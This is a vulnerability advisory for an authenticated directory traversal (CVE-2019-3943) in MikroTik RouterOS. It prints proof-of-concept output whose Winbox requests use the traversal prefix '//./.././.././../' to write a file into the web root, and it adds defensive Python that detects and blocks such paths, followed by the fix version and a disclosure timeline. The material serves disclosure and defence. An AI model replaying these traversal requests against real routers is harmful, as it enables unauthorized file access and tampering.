Tenable discovered a vulnerability while analyzing MikroTik's RouterOS 6.42.12 (a long-term release). The vulnerability is an authenticated, remote directory traversal that gives an attacker with valid credentials mkdir, read, and write access to files outside of the sandbox path, /rw/disk. Such an attacker has read access to the entire filesystem and write access to every location that isn't marked read-only.
This vulnerability is very similar to CVE-2018-14847. The major difference is that this new vulnerability exists in the fileman binary (SYS_TO number: 72) and requires authentication to invoke. Otherwise, the traversal logic is the same, and it can be reached over HTTP or Winbox (port 8291).
The following output is from a [proof of concept](https://github.com/tenable/routeros/tree/master/poc/cve_2019_3943) that creates a webpage that simply says "hello!":
```
albinolobster@ubuntu:~/routeros/poc/cve_2019_3943/build$ curl http://192.168.1.15/webfig/lol.txt
<html>
<head><title>Error 404: Not Found</title></head>
<body>
<h1>Error 404: Not Found</h1>
</body>
</html>
albinolobster@ubuntu:~/routeros/poc/cve_2019_3943/build$ ./cve_2019_3943_poc -i 192.168.1.15 -p 8291
req: {bff0005:1,uff0006:1,uff0007:6,s1:'//./.././.././../pckg/lol',Uff0001:[72,1]}
resp: {uff0003:2,uff0006:1,Uff0001:[],Uff0002:[72,1]}
req: {bff0005:1,uff0006:2,uff0007:6,s1:'//./.././.././../pckg/lol/home',Uff0001:[72,1]}
resp: {uff0003:2,uff0006:2,Uff0001:[],Uff0002:[72,1]}
req: {bff0005:1,uff0006:3,uff0007:6,s1:'//./.././.././../pckg/lol/home/web/',Uff0001:[72,1]}
resp: {uff0003:2,uff0006:3,Uff0001:[],Uff0002:[72,1]}
req: {bff0005:1,uff0006:4,uff0007:6,s1:'//./.././.././../pckg/lol/home/web/webfig',Uff0001:[72,1]}
resp: {uff0003:2,uff0006:4,Uff0001:[],Uff0002:[72,1]}
req: {bff0005:1,uff0006:5,uff0007:1,s1:'//./.././.././../pckg/lol/home/web/webfig/lol.txt',Uff0001:[72,1]}
resp: {ufe0001:1,uff0003:2,uff0006:5,Uff0001:[],Uff0002:[72,1]}
req: {bff0005:1,ufe0001:1,uff0006:6,uff0007:2,r5:[104,101,108,108,111,33,10],Uff0001:[72,1]}
resp: {uff0003:2,uff0006:6,Uff0001:[],Uff0002:[72,1]}
albinolobster@ubuntu:~/routeros/poc/cve_2019_3943/build$ curl http://192.168.1.15/webfig/lol.txt
hello!
albinolobster@ubuntu:~/routeros/poc/cve_2019_3943/build$
```
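The transcript above shows the traversal prefix `//./.././.././../` carried in the `s1` field of fileman (SYS_TO 72) requests. The following is an added example, written for this page and not part of Tenable's proof of concept or MikroTik's code, that shows why a string-prefix check on the unnormalized path accepts those requests, how a normalize-then-compare check against the `/rw/disk` sandbox root rejects them, and how the same check can be run over captured request lines to flag traversal attempts. The transcript lines embedded below are copied from the advisory plus one constructed benign request; the function names and the regexes are assumptions of this example.

```python
import posixpath
import re

# Sandbox root named in the advisory; fileman operations are meant to stay under it.
SANDBOX_ROOT = "/rw/disk"

# Winbox handler number for the fileman binary, as stated in the advisory.
FILEMAN_SYS_TO = 72

# Constructed sample: four req lines copied from the PoC transcript, plus one
# constructed benign request (the last line) that stays inside the sandbox.
TRANSCRIPT = """\
req: {bff0005:1,uff0006:1,uff0007:6,s1:'//./.././.././../pckg/lol',Uff0001:[72,1]}
req: {bff0005:1,uff0006:3,uff0007:6,s1:'//./.././.././../pckg/lol/home/web/',Uff0001:[72,1]}
req: {bff0005:1,uff0006:5,uff0007:1,s1:'//./.././.././../pckg/lol/home/web/webfig/lol.txt',Uff0001:[72,1]}
req: {bff0005:1,ufe0001:1,uff0006:6,uff0007:2,r5:[104,101,108,108,111,33,10],Uff0001:[72,1]}
req: {bff0005:1,uff0006:7,uff0007:6,s1:'backups/2019-02-11.rsc',Uff0001:[72,1]}
"""


def naive_prefix_check(user_path, root=SANDBOX_ROOT):
    """A prefix check on the unnormalized joined string.

    This is the kind of check the '//./.././../' prefix walks straight past:
    the joined string still begins with the sandbox root, so it is accepted
    even though the kernel will resolve it to a path outside the sandbox.
    """
    return (root + "/" + user_path).startswith(root + "/")


def resolve_in_sandbox(user_path, root=SANDBOX_ROOT):
    """Join the request path onto the sandbox root, normalize '.', '..' and
    repeated slashes, and accept only a result that is still under root.

    Returns the normalized absolute path, or None if the path escapes.
    posixpath.normpath is purely lexical; on a live filesystem the same
    comparison must be made on os.path.realpath() so symlinks cannot escape.
    """
    # Strip leading slashes: posixpath.join would otherwise let an absolute
    # request path replace the root entirely.
    relative = user_path.lstrip("/")
    candidate = posixpath.normpath(posixpath.join(root, relative))
    if candidate == root or candidate.startswith(root + "/"):
        return candidate
    return None


# Assumed field layout, taken from the transcript: s1 carries the path and
# Uff0001 starts with the SYS_TO handler number.
_S1 = re.compile(r"s1:'([^']*)'")
_SYS_TO = re.compile(r"Uff0001:\[(\d+),")


def flag_traversal_requests(transcript, root=SANDBOX_ROOT):
    """Scan Winbox request lines and return (line_no, path) for every fileman
    request whose s1 path would escape the sandbox root."""
    flagged = []
    for line_no, line in enumerate(transcript.splitlines(), 1):
        if not line.startswith("req:"):
            continue
        m_to = _SYS_TO.search(line)
        m_s1 = _S1.search(line)
        if not (m_to and m_s1) or int(m_to.group(1)) != FILEMAN_SYS_TO:
            continue  # not a fileman request, or no path field (e.g. a data write)
        path = m_s1.group(1)
        if resolve_in_sandbox(path, root) is None:
            flagged.append((line_no, path))
    return flagged


if __name__ == "__main__":
    first = "//./.././.././../pckg/lol"
    print("naive prefix check accepts:", naive_prefix_check(first))
    print("normalized check resolves to:", resolve_in_sandbox(first))
    for line_no, path in flag_traversal_requests(TRANSCRIPT):
        print("line %d escapes sandbox: %s" % (line_no, path))
```

The design point is that the check must be made on the path the operating system will actually open, not on the bytes the client sent; normalizing first and then comparing against the root is what turns `/rw/disk/./.././.././../pckg/lol` back into `/pckg/lol` and exposes the escape.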
### Solution
Upgrade to RouterOS 6.44RC1 or newer for all releases (long-term, stable, and test).
### Additional References
https://github.com/tenable/routeros/tree/master/poc/cve_2019_3943
### Disclosure Timeline
* 02/11/2019 - Initial discovery.
* 02/12/2019 - Reported to MikroTik. The 90-day disclosure deadline is May 14.
* 02/13/2019 - MikroTik states, "we are looking into it, and will let you know as soon as we have reproduced it and provided a fix."
* 04/03/2019 - Tenable asks if MikroTik was able to reproduce.
* 04/08/2019 - MikroTik states, "The problem was resolved February 13, the fixed version 6.44 was released to web on February 15 as RC1 and later made it into 6.44 stable release too."
* 04/08/2019 - Tenable thanks MikroTik.
* 04/08/2019 - Tenable verifies the fix did in fact go out in February. Tenable notes that no information about the patch appears in the RouterOS release notes. Tenable was also not notified.
* 04/08/2019 - It has been pointed out that there is a changelog entry. It reads: "webfig: improved file handling;"